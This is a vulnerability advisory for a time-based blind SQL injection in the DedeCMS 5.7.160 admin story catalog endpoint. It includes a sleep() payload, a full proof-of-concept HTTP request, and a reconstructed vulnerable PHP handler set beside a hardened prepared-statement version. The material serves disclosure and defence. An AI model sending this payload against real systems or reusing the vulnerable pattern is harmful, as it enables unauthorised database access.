
DedeCMS V5.7.160 Backend Blind SQL Injection

Description

Blind SQL injection in the admin backend story catalog via POST parameters.

Affected Version

DedeCMS <= 5.7.160

POC

  1. Log in to the admin backend.
  2. Send a request to /dede/story_catalog.php with the GET parameter action=uprank and the POST parameter rank_1=1'+and+sleep(3)+and+'1; this payload triggers a time-based SQL injection.
  3. Requires PHP ≤ 5 and MySQL ≤ 5.5, and the story component must contain at least one record in the database.
  4. In the source code of /dede/story_catalog.php, when the GET parameter action is uprank, every POST value whose key contains rank_ is concatenated directly into the UPDATE SQL statement, which allows SQL injection into the UPDATE. The resulting statement is passed to mysqli_query, which returns only a boolean for an UPDATE statement, so no query results are exposed; this is why the injection is blind.
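The following is an added example, not DedeCMS's own source: a hypothetical reconstruction of the "rank_" handling pattern described in step 4, placed beside a hardened version of the same handler. The table and column names (story_catalog, rank, catid) and the function names are assumptions made for illustration.

```php
<?php
// Added example, not code from DedeCMS. Table/column names are assumptions.

// VULNERABLE PATTERN (as described in the advisory): every POST key that
// contains "rank_" has its raw value concatenated into an UPDATE statement.
// mysqli::query() returns only true/false for an UPDATE, so an injected
// sleep() is observable only as a delay: a time-based blind injection.
function uprank_vulnerable(mysqli $db, array $post): void
{
    foreach ($post as $key => $value) {
        if (strpos($key, 'rank_') === false) {
            continue;
        }
        $id = substr($key, strlen('rank_'));   // the key part is unvalidated too
        $db->query("UPDATE story_catalog SET rank='$value' WHERE catid='$id'");
    }
}

// HARDENED: accept only keys of the exact form rank_<digits>, accept only
// purely numeric values, and bind both as integers in a prepared statement.
// Returns the number of rows actually updated.
function uprank_hardened(mysqli $db, array $post): int
{
    $stmt = $db->prepare('UPDATE story_catalog SET rank = ? WHERE catid = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $updated = 0;
    foreach ($post as $key => $value) {
        // Reject keys such as "rank_1' ..." or "xrank_1"; capture the numeric id.
        if (!preg_match('/^rank_(\d{1,10})$/', (string) $key, $m)) {
            continue;
        }
        // Reject non-string or non-numeric values such as "1' and sleep(3) and '1".
        if (!is_string($value) || !ctype_digit($value)) {
            continue;
        }
        $rank = (int) $value;
        $id   = (int) $m[1];
        $stmt->bind_param('ii', $rank, $id);
        $stmt->execute();
        $updated += $stmt->affected_rows;
    }
    $stmt->close();
    return $updated;
}

// Usage sketch (connection parameters are placeholders):
// $db = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME');
// $rows = uprank_hardened($db, $_POST);
```

The hardened version closes both injection points the advisory identifies: the value and the key fragment after rank_ are each validated before use, and the prepared statement keeps data out of the SQL text entirely, so a payload like the one in step 2 is simply skipped rather than executed.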

Full POC request:

POST /cms/dedecms/dede/story_catalog.php?action=uprank HTTP/1.1
Host: 192.168.0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; _csrf_name_273c7533=e59946ea73ad488a9da6a03897480ac5; _csrf_name_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fstory_books.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

rank_1=1'+and+sleep(3)+and+'1

Reference

Reported by Srpopty, vulnerability discovered by using Corax.